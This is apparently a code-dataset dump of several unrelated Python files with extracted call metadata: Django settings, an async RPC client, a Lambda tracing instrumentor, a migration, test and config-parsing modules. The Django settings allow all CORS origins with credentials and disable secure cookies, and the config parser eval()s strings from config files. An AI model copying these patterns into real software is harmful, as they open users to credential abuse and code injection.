AWS_S3_REGION_NAME = os.environ.get('AWS_S3_REGION_NAME')
AWS_DEFAULT_ACL = None
#--------END AWS CONFIGURATION ---------------------#
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440*3
ROOT_URLCONF = '_main_.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = '_main_.wsgi.application'
CSRF_COOKIE_SECURE = False
SESSION_COOKIE_SECURE = False
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'remote-default': {
'ENGINE' : os.environ.get('DATABASE_ENGINE'),
'NAME' : os.environ.get('DATABASE_NAME'),
'USER' : os.environ.get('DATABASE_USER'),
'PASSWORD' : os.environ.get('DATABASE_PASSWORD'),
'HOST' : os.environ.get('DATABASE_HOST'),
'PORT' : os.environ.get('DATABASE_PORT')
},
'default': {
'ENGINE' : os.environ.get('DATABASE_ENGINE'),
'NAME' : 'gchekler21',
'USER' : '',
'PASSWORD' : '',
'HOST' : 'localhost',
'PORT' : '5555'
},
}
firebase_service_account_path = '/_main_/config/massenergizeProdFirebaseServiceAccount.json' if IS_PROD else '/_main_/config/massenergizeFirebaseServiceAccount.json'
FIREBASE_CREDENTIALS = credentials.Certificate(BASE_DIR + firebase_service_account_path)
firebase_admin.initialize_app(FIREBASE_CREDENTIALS)
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
EMAIL_HOST_USER = os.environ.get('EMAIL')
DEFAULT_FROM_EMAIL = os.environ.get('EMAIL')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASSWORD')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# Simplified static file serving.
STATICFILES_LOCATION = 'static'
MEDIAFILES_LOCATION = 'media'
| [((25, 0, 25, 30), 'os.environ.update', 'os.environ.update', ({(25, 18, 25, 29): 'CONFIG_DATA'}, {}), '(CONFIG_DATA)', False, 'import os\n'), ((84, 27, 84, 62), 'os.environ.get', 'os.environ.get', ({(84, 42, 84, 61): '"""AWS_ACCESS_KEY_ID"""'}, {}), "('AWS_ACCESS_KEY_ID')", False, 'import os\n'), ((85, 27, 85, 66), 'os.environ.get', 'os.environ.get', ({(85, 42, 85, 65): '"""AWS_SECRET_ACCESS_KEY"""'}, {}), "('AWS_SECRET_ACCESS_KEY')", False, 'import os\n'), ((86, 27, 86, 68), 'os.environ.get', 'os.environ.get', ({(86, 42, 86, 67): '"""AWS_STORAGE_BUCKET_NAME"""'}, {}), "('AWS_STORAGE_BUCKET_NAME')", False, 'import os\n'), ((87, 27, 87, 69), 'os.environ.get', 'os.environ.get', ({(87, 42, 87, 68): '"""AWS_S3_SIGNATURE_VERSION"""'}, {}), "('AWS_S3_SIGNATURE_VERSION')", False, 'import os\n'), ((88, 27, 88, 63), 'os.environ.get', 'os.environ.get', ({(88, 42, 88, 62): '"""AWS_S3_REGION_NAME"""'}, {}), "('AWS_S3_REGION_NAME')", False, 'import os\n'), ((143, 23, 143, 88), 'firebase_admin.credentials.Certificate', 'credentials.Certificate', ({(143, 47, 143, 87): 'BASE_DIR + firebase_service_account_path'}, {}), '(BASE_DIR + firebase_service_account_path)', False, 'from firebase_admin import credentials\n'), ((144, 0, 144, 51), 'firebase_admin.initialize_app', 'firebase_admin.initialize_app', ({(144, 30, 144, 50): 'FIREBASE_CREDENTIALS'}, {}), '(FIREBASE_CREDENTIALS)', False, 'import firebase_admin\n'), ((182, 18, 182, 41), 'os.environ.get', 'os.environ.get', ({(182, 33, 182, 40): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((183, 21, 183, 44), 'os.environ.get', 'os.environ.get', ({(183, 36, 183, 43): '"""EMAIL"""'}, {}), "('EMAIL')", False, 'import os\n'), ((184, 22, 184, 54), 'os.environ.get', 'os.environ.get', ({(184, 37, 184, 53): '"""EMAIL_PASSWORD"""'}, {}), "('EMAIL_PASSWORD')", False, 'import os\n'), ((19, 43, 19, 68), 'os.path.abspath', 'os.path.abspath', ({(19, 59, 19, 67): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((125, 21, 125, 54), 'os.environ.get', 'os.environ.get', ({(125, 36, 125, 53): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n'), ((126, 21, 126, 52), 'os.environ.get', 'os.environ.get', ({(126, 36, 126, 51): '"""DATABASE_NAME"""'}, {}), "('DATABASE_NAME')", False, 'import os\n'), ((127, 21, 127, 52), 'os.environ.get', 'os.environ.get', ({(127, 36, 127, 51): '"""DATABASE_USER"""'}, {}), "('DATABASE_USER')", False, 'import os\n'), ((128, 21, 128, 56), 'os.environ.get', 'os.environ.get', ({(128, 36, 128, 55): '"""DATABASE_PASSWORD"""'}, {}), "('DATABASE_PASSWORD')", False, 'import os\n'), ((129, 21, 129, 52), 'os.environ.get', 'os.environ.get', ({(129, 36, 129, 51): '"""DATABASE_HOST"""'}, {}), "('DATABASE_HOST')", False, 'import os\n'), ((130, 21, 130, 52), 'os.environ.get', 'os.environ.get', ({(130, 36, 130, 51): '"""DATABASE_PORT"""'}, {}), "('DATABASE_PORT')", False, 'import os\n'), ((133, 22, 133, 55), 'os.environ.get', 'os.environ.get', ({(133, 37, 133, 54): '"""DATABASE_ENGINE"""'}, {}), "('DATABASE_ENGINE')", False, 'import os\n')] |
urands/aiorpcgrid | aiorpcgrid/client.py | 7bc9ee9a80fa843998b2604d7c0803b323628480 | import asyncio
# from aiorpcgrid.client import Client
from aiorpcgrid.task import AsyncTask, State
class AsyncClient:
_provider = None
_method = None
_requests: dict = {}
_running = True
_request_queue: asyncio.Queue = asyncio.Queue()
_loop = None
def __init__(self, provider, loop=None):
self._provider = provider
if loop is None:
loop = asyncio.get_event_loop()
self._loop = loop
async def open(self):
await self._provider.open()
asyncio.ensure_future(self.request_loop(), loop=self._loop)
asyncio.ensure_future(self.run(), loop=self._loop)
return self
async def close(self):
self._running = False
await self._provider.close()
await self._request_queue.put(None)
async def request_loop(self):
while self._running:
task = await self._request_queue.get()
if task is not None:
                await self._provider.call_method(task)
task.status = State.RUNNING
if self._request_queue.empty():
self._request_queue.task_done()
async def run(self):
while self._running:
responses = await self._provider.recv()
if responses is not None:
for response in responses:
if response.id in self._requests:
task = self._requests[response.id]
task.result = response.result
task.error = response.error
if task.error is None:
self._requests[
response.id
].status = State.COMPLETED
else:
self._requests[response.id].status = State.FAILED
task.event.set()
del self._requests[response.id]
if task._callback is not None:
asyncio.ensure_future(
task.callback(task), loop=self._loop
)
def __call__(self, *args, **kwargs):
        if not self._provider.is_connected():
raise ConnectionError(f'Connection lost. {self._provider}')
task = AsyncTask().create(self._method, *args, **kwargs)
if 'parallel' in kwargs:
task._parallel = kwargs['parallel']
self._method = None
task.status = State.PENDING
self._requests[task.id] = task
self._request_queue.put_nowait(self._requests[task.id])
return self._requests[task.id]
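# Illustrative usage sketch (assumed calling convention, not from the original
# source; the mechanism that sets _method before __call__ is defined elsewhere):
#
#   async def main():
#       client = await AsyncClient(provider).open()
#       task = client(1, 2)          # enqueues an AsyncTask via __call__
#       await task.event.wait()      # run() sets the event when a response arrives
#       await client.close()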
| [((12, 36, 12, 51), 'asyncio.Queue', 'asyncio.Queue', ({}, {}), '()', False, 'import asyncio\n'), ((18, 19, 18, 43), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((67, 15, 67, 26), 'aiorpcgrid.task.AsyncTask', 'AsyncTask', ({}, {}), '()', False, 'from aiorpcgrid.task import AsyncTask, State\n')] |
matt-tyler/opentelemetry-lambda | python/src/otel/otel_sdk/opentelemetry/instrumentation/aws_lambda/__init__.py | 6b427d351fa721620fcd387e836e9f2f9f20cb60 | # Copyright 2020, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: usage
"""
The opentelemetry-instrumentation-aws-lambda package allows tracing AWS
Lambda function.
Usage
-----
.. code:: python
# Copy this snippet into AWS Lambda function
# Ref Doc: https://docs.aws.amazon.com/lambda/latest/dg/lambda-python.html
import boto3
from opentelemetry.instrumentation.aws_lambda import (
AwsLambdaInstrumentor
)
# Enable instrumentation
AwsLambdaInstrumentor().instrument()
# Lambda function
def lambda_handler(event, context):
s3 = boto3.resource('s3')
for bucket in s3.buckets.all():
print(bucket.name)
return "200 OK"
API
---
"""
import logging
import os
from importlib import import_module
from wrapt import wrap_function_wrapper
# TODO: aws propagator
from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import (
AwsXRayFormat,
)
from opentelemetry.instrumentation.aws_lambda.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider
logger = logging.getLogger(__name__)
class AwsLambdaInstrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
self._tracer = get_tracer(__name__, __version__, kwargs.get("tracer_provider"))
self._tracer_provider = get_tracer_provider()
lambda_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
wrapped_names = lambda_handler.rsplit(".", 1)
self._wrapped_module_name = wrapped_names[0]
self._wrapped_function_name = wrapped_names[1]
wrap_function_wrapper(
self._wrapped_module_name,
self._wrapped_function_name,
self._functionPatch,
)
def _uninstrument(self, **kwargs):
unwrap(
import_module(self._wrapped_module_name),
self._wrapped_function_name,
)
def _functionPatch(self, original_func, instance, args, kwargs):
lambda_context = args[1]
ctx_aws_request_id = lambda_context.aws_request_id
ctx_invoked_function_arn = lambda_context.invoked_function_arn
orig_handler = os.environ.get("ORIG_HANDLER", os.environ.get("_HANDLER"))
# TODO: enable propagate from AWS by env variable
xray_trace_id = os.environ.get("_X_AMZN_TRACE_ID", "")
lambda_name = os.environ.get("AWS_LAMBDA_FUNCTION_NAME")
function_version = os.environ.get("AWS_LAMBDA_FUNCTION_VERSION")
propagator = AwsXRayFormat()
parent_context = propagator.extract({"X-Amzn-Trace-Id": xray_trace_id})
with self._tracer.start_as_current_span(
name=orig_handler, context=parent_context, kind=SpanKind.SERVER
) as span:
# Refer: https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/faas.md#example
span.set_attribute("faas.execution", ctx_aws_request_id)
span.set_attribute("faas.id", ctx_invoked_function_arn)
            # TODO: fix in Collector because these belong in resource attributes
span.set_attribute("faas.name", lambda_name)
span.set_attribute("faas.version", function_version)
result = original_func(*args, **kwargs)
# force_flush before function quit in case of Lambda freeze.
self._tracer_provider.force_flush()
return result
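# Note: the wrapped handler name is taken from ORIG_HANDLER or _HANDLER as set
# by the Lambda runtime, e.g. _HANDLER="app.lambda_handler" patches function
# "lambda_handler" in module "app" (hypothetical value for illustration).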
| [((62, 9, 62, 36), 'logging.getLogger', 'logging.getLogger', ({(62, 27, 62, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((69, 32, 69, 53), 'opentelemetry.trace.get_tracer_provider', 'get_tracer_provider', ({}, {}), '()', False, 'from opentelemetry.trace import SpanKind, get_tracer, get_tracer_provider\n'), ((76, 8, 80, 9), 'wrapt.wrap_function_wrapper', 'wrap_function_wrapper', ({(77, 12, 77, 37): 'self._wrapped_module_name', (78, 12, 78, 39): 'self._wrapped_function_name', (79, 12, 79, 31): 'self._functionPatch'}, {}), '(self._wrapped_module_name, self.\n _wrapped_function_name, self._functionPatch)', False, 'from wrapt import wrap_function_wrapper\n'), ((95, 24, 95, 62), 'os.environ.get', 'os.environ.get', ({(95, 39, 95, 57): '"""_X_AMZN_TRACE_ID"""', (95, 59, 95, 61): '""""""'}, {}), "('_X_AMZN_TRACE_ID', '')", False, 'import os\n'), ((97, 22, 97, 64), 'os.environ.get', 'os.environ.get', ({(97, 37, 97, 63): '"""AWS_LAMBDA_FUNCTION_NAME"""'}, {}), "('AWS_LAMBDA_FUNCTION_NAME')", False, 'import os\n'), ((98, 27, 98, 72), 'os.environ.get', 'os.environ.get', ({(98, 42, 98, 71): '"""AWS_LAMBDA_FUNCTION_VERSION"""'}, {}), "('AWS_LAMBDA_FUNCTION_VERSION')", False, 'import os\n'), ((100, 21, 100, 36), 'opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format.AwsXRayFormat', 'AwsXRayFormat', ({}, {}), '()', False, 'from opentelemetry.sdk.extension.aws.trace.propagation.aws_xray_format import AwsXRayFormat\n'), ((71, 56, 71, 82), 'os.environ.get', 'os.environ.get', ({(71, 71, 71, 81): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n'), ((84, 12, 84, 52), 'importlib.import_module', 'import_module', ({(84, 26, 84, 51): 'self._wrapped_module_name'}, {}), '(self._wrapped_module_name)', False, 'from importlib import import_module\n'), ((92, 54, 92, 80), 'os.environ.get', 'os.environ.get', ({(92, 69, 92, 79): '"""_HANDLER"""'}, {}), "('_HANDLER')", False, 'import os\n')] |
bastoune57/gokiting_back_end | instructors/migrations/0021_alter_user_avatar_url.py | f3edcbeede292713349b28f2390b5d57e1420f8e | # Generated by Django 4.0.2 on 2022-04-01 16:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instructors', '0020_alter_user_description_alter_user_title'),
]
operations = [
migrations.AlterField(
model_name='user',
name='avatar_url',
field=models.ImageField(default='profile_pics/einstein_EqBibwO.jpeg', upload_to='profile_pics'),
),
]
| [((16, 18, 16, 107), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n')] |
SamplingAndEnsemblingSolvers/SamplingAndEnsemblingSolvers | sopa/src/models/utils.py | 5ad3cae76c3cc9cec4d347807012e61121ea61b9 | import numpy as np
import torch
import random
from .odenet_mnist.layers import MetaNODE
def fix_seeds(seed=502):
np.random.seed(seed)
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.set_printoptions(precision=10)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
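# Note: forcing deterministic cuDNN kernels and disabling benchmark mode, as
# fix_seeds() does above, trades some GPU throughput for reproducible runs.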
class RunningAverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, momentum=0.99):
self.momentum = momentum
self.reset()
def reset(self):
self.val = None
self.avg = 0
def update(self, val):
if self.val is None:
self.avg = val
else:
self.avg = self.avg * self.momentum + val * (1 - self.momentum)
self.val = val
def load_model(path):
    (_, state_dict), (_, model_args), (_, solver_id) = torch.load(path, map_location='cpu').items()
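    # checkpoints are assumed to be a dict of three entries: the model
    # state_dict, the training argument namespace, and a solver identifier
    # (unused here)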
is_odenet = model_args.network == 'odenet'
if not hasattr(model_args, 'in_channels'):
model_args.in_channels = 1
model = MetaNODE(downsampling_method=model_args.downsampling_method,
is_odenet=is_odenet,
in_channels=model_args.in_channels)
model.load_state_dict(state_dict)
return model, model_args | [((8, 4, 8, 24), 'numpy.random.seed', 'np.random.seed', ({(8, 19, 8, 23): 'seed'}, {}), '(seed)', True, 'import numpy as np\n'), ((9, 4, 9, 21), 'random.seed', 'random.seed', ({(9, 16, 9, 20): 'seed'}, {}), '(seed)', False, 'import random\n'), ((10, 4, 10, 27), 'torch.manual_seed', 'torch.manual_seed', ({(10, 22, 10, 26): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((11, 4, 11, 36), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', ({(11, 31, 11, 35): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((12, 4, 12, 40), 'torch.set_printoptions', 'torch.set_printoptions', (), '', False, 'import torch\n'), ((37, 55, 37, 91), 'torch.load', 'torch.load', (), '', False, 'import torch\n')] |
TheVinhLuong102/micropy-stubs | packages/micropython-official/v1.10/esp32/stubs/ubinascii.py | 55ff1773008f7c4dfc3d70a403986486226eb6b3 | """
Module: 'ubinascii' on esp32 1.10.0
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.10.0', version='v1.10 on 2019-01-25', machine='ESP32 module with ESP32')
# Stubber: 1.2.0
def a2b_base64():
pass
def b2a_base64():
pass
def crc32():
pass
def hexlify():
pass
def unhexlify():
pass
| [] |
chenwang/QuantEcon.lectures.code | jv/test_jv.py | 8832a74acd219a71cb0a99dc63c5e976598ac999 | """
@author : Spencer Lyon
"""
from __future__ import division
import sys
import unittest
from nose.plugins.skip import SkipTest
from jv import JvWorker
from quantecon import compute_fixed_point
from quantecon.tests import get_h5_data_file, write_array, max_abs_diff
# specify params -- use defaults
A = 1.4
alpha = 0.6
beta = 0.96
grid_size = 50
if sys.version_info[0] == 2:
v_nm = "V"
else: # python 3
raise SkipTest("Python 3 tests aren't ready.")
v_nm = "V_py3"
def _new_solution(jv, f, grp):
"gets new solution and updates data file"
V = _solve_via_vfi(jv)
write_array(f, grp, V, v_nm)
return V
def _solve_via_vfi(jv):
"compute policy rules via value function iteration"
v_init = jv.x_grid * 0.6
V = compute_fixed_point(jv.bellman_operator, v_init,
max_iter=3000,
error_tol=1e-5)
return V
def _get_vf_guess(jv, force_new=False):
with get_h5_data_file() as f:
# See if the jv group already exists
group_existed = True
try:
jv_group = f.getNode("/jv")
except:
# doesn't exist
group_existed = False
jv_group = f.create_group("/", "jv", "data for jv.py tests")
if force_new or not group_existed:
# group doesn't exist, or forced to create new data.
# This function updates f in place and returns v_vfi, c_vfi, c_pfi
V = _new_solution(jv, f, jv_group)
return V
# if we made it here, the group exists and we should try to read
# existing solutions
try:
# Try reading vfi
if sys.version_info[0] == 2:
V = jv_group.V[:]
else: # python 3
V = jv_group.V_py3[:]
except:
# doesn't exist. Let's create it
V = _new_solution(jv, f, jv_group)
return V
class TestJvWorker(unittest.TestCase):
@classmethod
def setUpClass(cls):
jv = JvWorker(A=A, alpha=alpha, beta=beta, grid_size=grid_size)
cls.jv = jv
# compute solution
v_init = _get_vf_guess(jv)
cls.V = compute_fixed_point(jv.bellman_operator, v_init)
cls.s_pol, cls.phi_pol = jv.bellman_operator(cls.V * 0.999,
return_policies=True)
def test_low_x_prefer_s(self):
"jv: s preferred to phi with low x?"
# low x is an early index
self.assertGreaterEqual(self.s_pol[0], self.phi_pol[0])
def test_high_x_prefer_phi(self):
"jv: phi preferred to s with high x?"
        # high x is a late index
self.assertGreaterEqual(self.phi_pol[-1], self.s_pol[-1])
def test_policy_sizes(self):
"jv: policies correct size"
n = self.jv.x_grid.size
self.assertEqual(self.s_pol.size, n)
self.assertEqual(self.phi_pol.size, n)
def test_bellman_sol_fixed_point(self):
"jv: solution to bellman is fixed point"
new_V = self.jv.bellman_operator(self.V)
self.assertLessEqual(max_abs_diff(new_V, self.V), 1e-4)
| [((23, 10, 23, 50), 'nose.plugins.skip.SkipTest', 'SkipTest', ({(23, 19, 23, 49): '"""Python 3 tests aren\'t ready."""'}, {}), '("Python 3 tests aren\'t ready.")', False, 'from nose.plugins.skip import SkipTest\n'), ((30, 4, 30, 32), 'quantecon.tests.write_array', 'write_array', ({(30, 16, 30, 17): 'f', (30, 19, 30, 22): 'grp', (30, 24, 30, 25): 'V', (30, 27, 30, 31): 'v_nm'}, {}), '(f, grp, V, v_nm)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((38, 8, 40, 43), 'quantecon.compute_fixed_point', 'compute_fixed_point', (), '', False, 'from quantecon import compute_fixed_point\n'), ((45, 9, 45, 27), 'quantecon.tests.get_h5_data_file', 'get_h5_data_file', ({}, {}), '()', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n'), ((83, 13, 83, 71), 'jv.JvWorker', 'JvWorker', (), '', False, 'from jv import JvWorker\n'), ((88, 16, 88, 64), 'quantecon.compute_fixed_point', 'compute_fixed_point', ({(88, 36, 88, 55): 'jv.bellman_operator', (88, 57, 88, 63): 'v_init'}, {}), '(jv.bellman_operator, v_init)', False, 'from quantecon import compute_fixed_point\n'), ((111, 29, 111, 56), 'quantecon.tests.max_abs_diff', 'max_abs_diff', ({(111, 42, 111, 47): 'new_V', (111, 49, 111, 55): 'self.V'}, {}), '(new_V, self.V)', False, 'from quantecon.tests import get_h5_data_file, write_array, max_abs_diff\n')] |
LaudateCorpus1/excentury | excentury/command/config.py | 8d0f20bb3e543382170e042fac51a56377c4024b | """Config
This module is in charge of providing all the necessary settings to
the rest of the modules in excentury.
"""
import os
import re
import sys
import textwrap
import argparse
from collections import OrderedDict
from excentury.command import error, trace, import_mod
DESC = """Edit a configuration file for excentury.
Some actions performed by excentury can be overwritten by using
configuration files.
To see the values that the configuration file can overwrite use the
`defaults` command. This will print a list of the keys and values
excentury uses for the given command.
"""
RE = re.compile(r'\${(?P<key>.*?)}')
RE_IF = re.compile(
r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]'
)
RE_IFELSE = re.compile(
r'(?P<iftrue>.*?) IF\[\[(?P<cond>.*?)\]\]ELSE (?P<iffalse>.*)'
)
def disp(msg):
"""Wrapper around sys.stdout.write which is meant to behave as
the print function but it does not add the newline character. """
sys.stdout.write(msg)
def _replacer(*key_val):
"""Helper function for replace.
Source: <http://stackoverflow.com/a/15221068/788553>
"""
replace_dict = dict(key_val)
replacement_function = lambda match: replace_dict[match.group(0)]
pattern = re.compile("|".join([re.escape(k) for k, _ in key_val]), re.M)
return lambda string: pattern.sub(replacement_function, string)
def replace(string, *key_val):
"""Replacement of strings done in one pass. Example:
>>> replace("a < b && b < c", ('<', '<'), ('&', '&'))
'a < b && b < c'
Source: <http://stackoverflow.com/a/15221068/788553>
"""
return _replacer(*key_val)(string)
class ConfigDispAction(argparse.Action): # pylint: disable=R0903
"""Derived argparse Action class to use when displaying the
configuration file and location."""
def __call__(self, parser, namespace, values, option_string=None):
try:
read_config(namespace)
except IOError:
disp('xcpp.config not found in %r\n' % namespace.cfg)
else:
disp('path to xcpp.config: "%s"\n' % namespace.cfg)
with open('%s/xcpp.config' % namespace.cfg, 'r') as _fp:
disp(_fp.read())
exit(0)
def add_parser(subp, raw):
"Add a parser to the main subparser. "
tmpp = subp.add_parser('config', help='configure excentury',
formatter_class=raw,
description=textwrap.dedent(DESC))
tmpp.add_argument('var', type=str, nargs='?', default=None,
help='Must be in the form of sec.key')
tmpp.add_argument('-v', action='store_true',
help='print config file location')
tmpp.add_argument('--print', action=ConfigDispAction,
nargs=0,
help='print config file and exit')
def _get_replacements(tokens, data, sec):
"""Helper function for _read_config. """
replacements = list()
for token in tokens:
if ':' in token:
tsec, tkey = token.split(':')
tval = ''
if tsec in data:
if tkey in data[tsec]:
tval = data[tsec][tkey]
else:
if token in data[sec]:
tval = data[sec][token]
else:
tval = ''
replacements.append(
('${%s}' % token, tval)
)
return replacements
# pylint: disable=invalid-name
# ARG and CFG are names that may be used in the configuration file.
# ARG gives us access to the command line arguments and CFG gives us
# access to the current configuration. Note that using CFG[key][sec]
# is equivalent to ${key:sec}. These names go against the convention
# so that they may be easy to spot in a configuration file.
def _eval_condition(cond, ARG, CFG, line_num, fname):
"""Evaluates a string using the eval function. It prints a
warning if there are any errors. Returns the result of the
evaluation and an error number: 0 if everything is fine, 1 if
there was an error. """
ARG.FILEPATH = '%s/%s/%s' % (ARG.cfg, CFG['xcpp']['path'], ARG.inputfile)
try:
# pylint: disable=eval-used
# To be able to evaluate a condition without creating a whole
# new parser we can use the eval function. We could have use
# a python file as a configuration but then there would be
# no simple structure to the files.
cond = eval(cond)
enum = 0
# pylint: disable=broad-except
# Anything can go wrong during the execution of the `eval`
# function. For this reason we must try to catch anything that
# may come our way so that we may give out a warning message
# and ignore it.
except Exception as exception:
cond = None
enum = 1
trace(
'WARNING: error in line %d of %r: %s\n' % (
line_num, fname, exception.message
)
)
return cond, enum
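# For example (hypothetical config line), "opt = fast IF[[ARG.parser_name ==
# 'build']]" reaches _eval_condition with cond == "ARG.parser_name == 'build'";
# conditions may also reference CFG and ARG.FILEPATH, which is set above.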
def _read_config(fname, arg):
"""Simple parser to read configuration files. """
data = OrderedDict()
sec = None
line_num = 0
with open(fname, 'r') as fhandle:
for line in fhandle:
line_num += 1
if line[0] == '[':
sec = line[1:-2]
data[sec] = OrderedDict()
elif '=' in line:
tmp = line.split('=', 1)
key = tmp[0].strip()
val = tmp[1].strip()
val = os.path.expandvars(val)
replacements = _get_replacements(
RE.findall(val), data, sec
)
# pylint: disable=star-args
if replacements:
val = replace(val, *replacements)
match = RE_IFELSE.match(val)
if match:
cond, enum = _eval_condition(
match.group('cond'), arg, data, line_num, fname
)
if enum == 1:
continue
groups = match.groups()
val = groups[0] if cond else groups[2]
else:
match = RE_IF.match(val)
if match:
cond, enum = _eval_condition(
match.group('cond'), arg, data, line_num, fname
)
if enum == 1:
continue
if cond:
val = match.group('iftrue')
else:
continue
data[sec][key] = val
return data
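# Illustrative xcpp.config sketch (hypothetical values) in the format parsed
# above -- [section] headers, key = value pairs, ${sec:key} substitution and
# trailing IF[[condition]]ELSE clauses:
#
#   [xcpp]
#   path = src
#   root = ${xcpp:path}/build
#   flag = -O2 IF[[ARG.parser_name == 'to']]ELSE -g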
def read_config(arg):
"""Read the configuration file xcpp.config"""
path = arg.cfg
if path == '.' and not os.path.exists('xcpp.config'):
if 'XCPP_CONFIG_PATH' in os.environ:
tmp_path = os.environ['XCPP_CONFIG_PATH']
if os.path.exists('%s/xcpp.config' % tmp_path):
trace("Configured with: '%s/xcpp.config'\n" % tmp_path)
path = tmp_path
elif not os.path.exists('%s/xcpp.config' % path):
error("ERROR: %s/xcpp.config does not exist\n" % path)
arg.cfg = path
try:
config = _read_config('%s/xcpp.config' % path, arg)
except IOError:
config = OrderedDict()
return config
def run(arg):
"""Run command. """
config = read_config(arg)
if arg.v:
disp('path to xcpp.config: "%s"\n' % arg.cfg)
if arg.var is None:
for sec in config:
disp('[%s]\n' % sec)
for key in config[sec]:
disp(' %s = %s\n' % (key, config[sec][key]))
disp('\n')
return
try:
command, var = arg.var.split('.', 1)
except ValueError:
error("ERROR: '%s' is not of the form sec.key\n" % arg.var)
try:
disp(config[command][var]+'\n')
except KeyError:
pass
return
def _update_single(cfg, name, defaults=None):
"Helper function for get_cfg."
if defaults:
for var, val in defaults.iteritems():
cfg[name][var] = os.path.expandvars(str(val))
else:
mod = import_mod('excentury.command.%s' % name)
if hasattr(mod, "DEFAULTS"):
for var, val in mod.DEFAULTS.iteritems():
cfg[name][var] = os.path.expandvars(val)
def _update_from_file(cfg, name, cfg_file):
"Helper function for get_cfg."
if name in cfg_file:
for var, val in cfg_file[name].iteritems():
cfg[name][var] = os.path.expandvars(val)
def _update_from_arg(cfg, argdict, key):
"Helper function for get_cfg."
for var in cfg[key]:
if var in argdict and argdict[var] is not None:
cfg[key][var] = argdict[var]
def get_cfg(arg, names, defaults=None):
"""Obtain the settings for a command. """
cfg = {
'xcpp': {
'root': '.',
'path': '.'
}
}
cfg_file = read_config(arg)
if 'xcpp' in cfg_file:
for var, val in cfg_file['xcpp'].iteritems():
cfg['xcpp'][var] = os.path.expandvars(val)
cfg['xcpp']['root'] = arg.cfg
if isinstance(names, list):
for name in names:
cfg[name] = dict()
_update_single(cfg, name)
_update_from_file(cfg, name, cfg_file)
else:
if names != 'xcpp':
cfg[names] = dict()
_update_single(cfg, names, defaults)
_update_from_file(cfg, names, cfg_file)
argdict = vars(arg)
if arg.parser_name in cfg:
_update_from_arg(cfg, argdict, arg.parser_name)
elif arg.parser_name == 'to' and arg.lang in cfg:
_update_from_arg(cfg, argdict, arg.lang)
_update_from_arg(cfg, argdict, 'xcpp')
return cfg
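# Resolution order implemented above: hard-coded defaults (or the command
# module's DEFAULTS), then values read from xcpp.config, then any non-None
# command-line arguments, with environment variables expanded at each step.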
